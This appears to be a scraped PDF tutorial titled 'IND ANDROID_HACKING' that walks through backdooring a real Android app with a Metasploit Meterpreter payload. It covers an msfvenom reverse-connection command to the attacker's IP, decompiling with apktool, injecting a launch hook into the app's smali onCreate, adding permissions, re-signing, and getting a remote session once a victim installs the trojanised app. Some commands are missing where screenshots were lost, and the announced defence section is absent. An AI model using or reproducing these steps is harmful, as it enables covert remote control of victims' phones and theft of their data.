Escolar Documentos
Profissional Documentos
Cultura Documentos
SHUBHAM YADAV
[Document subtitle]
IND ANDROID_HACKING By:- Shubham Yadav
Attention Hackers!
When you read this book, we would absolutely LOVE to hear your comments on it.
Is it useful?
Is it well written?
Did you find anything to correct?
Is there anything missing?
Is there anything you want to see more of?
Is there anything you want to see less of?
Thank you!
Table of Contents
Install Instructions
Quick Check………………………………………………………………………………………………………………….……………………..
Backdooring App
Decompile the payload and the original apk…………………………………………………………………….………………….
Copy The Payload Files…………………………………………………………………………………………………………………………
Hook injection inside “.SMALI CODE”…………..………………………………………………………………………………………
INJECT the NECESSARY PERMISSIONS……………..………………………………………………………………………..…………
RECOMPILE the ORIGINAL APK………………………………………………………………………………………………….…………
SIGN the APK……………….………………………………………………………………………………………………………………………
Meterpreter Session:
IND ANDROID_HACKING By:- Shubham Yadav
Install Instructions
Quick Check
1. Is Java 1.7 installed? If Yes go to step 2 or not go to step 3
2. Does executing java –version on command line / command prompt return 1.7?
Linux:
1. Download Linux wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Make sure you have the 32bit libraries ( ia32-libs ) downloaded and installed by your linux
package manager, if you are on a 64bit unix system.
4. (This helps provide support for the 32bit native binary aapt, which is required by apktool)
5. Rename downloaded jar to apktool.jar
6. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
We will also need some libraries and tools in the following steps, so I think it's better if you
install them right now.
To install the required libraries, enter this command at the console:
IND ANDROID_HACKING By:- Shubham Yadav
Windows:
1. Download Windows wrapper script (Right click, Save Link As apktool.bat )
2. Download apktool_2.2.0.jar (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool.bat ) to your Windows directory (Usually
C://Windows )
5. If you do not have access to C://Windows , you may place the two files anywhere then
add that
directory to your Environment Variables System PATH variable.
6. Try running apktool via command prompt
Mac OS X:
1. Download Mac wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
5. Make sure both files are executable ( chmod +x )
6. Try running apktool via cli
Overview:
We know this tutorial is a little bit long, Let's me tell you what we are going to do here.
1.Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Get Clean apk file from any site
3.Copy the payload smali folder to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml le
6.Re-compile the original apk
7.Sign the apk using Jarsigner
8.Going to fake apk file on network
9.Run Meterpreter session
10.HOW TO DESCOVER IT ON YOUR NETWORK AND Defend Your self
A payload in metapsloit refers to an exploit module. There are three different types of
payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different
types allow for a great deal of versatility and can be useful across numerous types of
scenarios. Whether or not a payload is staged, is represented by ‘/’ in the payload name. For
example, “windows/shell_bind_tcp” is a single payload with no stage, whereas
“windows/shell/bind_tcp” consists of a stager (bind_tcp) and a stage (shell).
IND ANDROID_HACKING By:- Shubham Yadav
Contents
1- Singles
2- Stagers
3- Stages
Singles:
Singles are payloads that are self-contained and completely standalone. A Single payload
can be something as simple as adding a user to the target system or running calc.exe.
These kinds of payloads are self-contained, so they can be caught with non-metasploit
handlers such as netcat.
Stagers:
Stagers setup a network connection between the attacker and victim and are designed to be
small and reliable. It is difficult to always do both of these well so the result is multiple
similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred
one when necessary.
Stages:
Stages are payload components that are downloaded by Stagers modules. The various
payload stages provide advanced features with no size limits such as Meterpreter, VNC
Injection, and the iPhone ‘ipwn’ Shell.
Msfvenom VS MSFpayload
msfpayload is a command line instance of Metasploit that is used to generate and output all
of the various types of shellcode that are available in Metasploit. The most common use of
this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing an Exploit Module.
IND ANDROID_HACKING By:- Shubham Yadav
So after understand what is payload Let’s Start Generate our payload by flowing this
command line:
msfvenom --platform android -p android/meterpreter/Payload_Type
LHOST=(IP_Address) LPORT=(Incoming_Port) -o meterpreter.apk
Explanation:
--platform: The platform of the payload (Android, Windows, Linux … )
To see what payloads are available from Framework, you can do:
You can use any one you like, I'm going to use reverse_https as an example.
Replace IP_Address by the IP address to which the payload is going to connect back to, i.e
the IP address of the attacker's system. If you are going to perform this attack over a local
IND ANDROID_HACKING By:- Shubham Yadav
network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local
IP will su ce. To know what
your local IP is, run the command –
If you are going to perform this attack over the Internet, you have to use your public IP
address, and con gure your router properly (set up port forwarding) so that your system is
accessible from the Internet. To know your public IP, just google "My IP" and Google will
help you out.
Replace Incoming_Port with the port no. which you want to be used by the payload to
connect to your system. This can be any valid port except the reserved ones like port 80
(HTTP).
I'm going to use 5555 as an example.
Appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root
directory. Note that we spaced the output fille name using the "-o meterpreter.apk"
argument in the command, so if you like, you can name it anything else also.
Backdooring App
Decompile the payload and the original apk:
Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the
code to a fairly human-readable format and saves it in .smali files, and also successfully
extracts the .xml files. Assuming you have already
installed the latest apktool and also have the original apk le in the root directory, run the
following commands –
Note that this folder does not exists, so you have to create it.
IND ANDROID_HACKING By:- Shubham Yadav
Let search for activities sections code in the AndroidManifest.xml file, located inside the
"Desktop/FreeWiFiConnect" folder using any text editor.
You can use CTRL+F to search for an <activity> tag which contains both the lines –
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
note this "android:name" attribute's value. In my case, as you can see from the previous
screenshot , it is "com.mentisco.freewificonnect.activity.SplashActivity".
This attribute showing us where we going to inject hook so you can change the dote with
slash and add .smali at the end follow screenshot
or using gedit
Now we have the name of the activity we want to inject the hook into, let's edit the .smali
code of that activity by “vi or gedit”
Now search for the following line in the smali code using CTRL+F –
;->onCreate(Landroid/os/Bundle;)V
IND ANDROID_HACKING By:- Shubham Yadav
When you locate it, paste the following code in the line next to it –
What we are doing here is, inserting a code which starts the payload alongside the existing
code which is executed when the activity starts. Now, save the edited smali file.
If we do not mention all the additional permissions that our payload is going to need, it
cannot function properly. While installing an app, these permissions are shown to the user.
But most of the users don't care to read all those boring texts, so we do not have to worry
about that much.
These permissions are also listed in the previously encountered AndroidManifest file. So
let's open the AndroidManifest.xml of both the original app and the payload from the
respective folders. The permissions are mentioned inside <uses-permission> tag as an
attribute 'android:name'. Copy the additional permission lines from the Payload's
AndroidManifest to the original app's one. But be careful that there should not be any
duplicate.
apktool b Desktop/FreeWiFiConnect
You will now have the compiled apk inside the "Desktop/FreeWiFiConnect/dist" directory.
But, we're still have one step to finish backdoored app called “sign apk”.
IND ANDROID_HACKING By:- Shubham Yadav
In this case we are going to sign the apk using the default android debug key. Just run the
following command –
Be sure to replace the apk_path in the above command with the path to your backdoored
apk file.
Meterpreter Session:
Now After victim received backdoored app and he installed and run it in his phone, you can
get a working meterpreter session on his phone!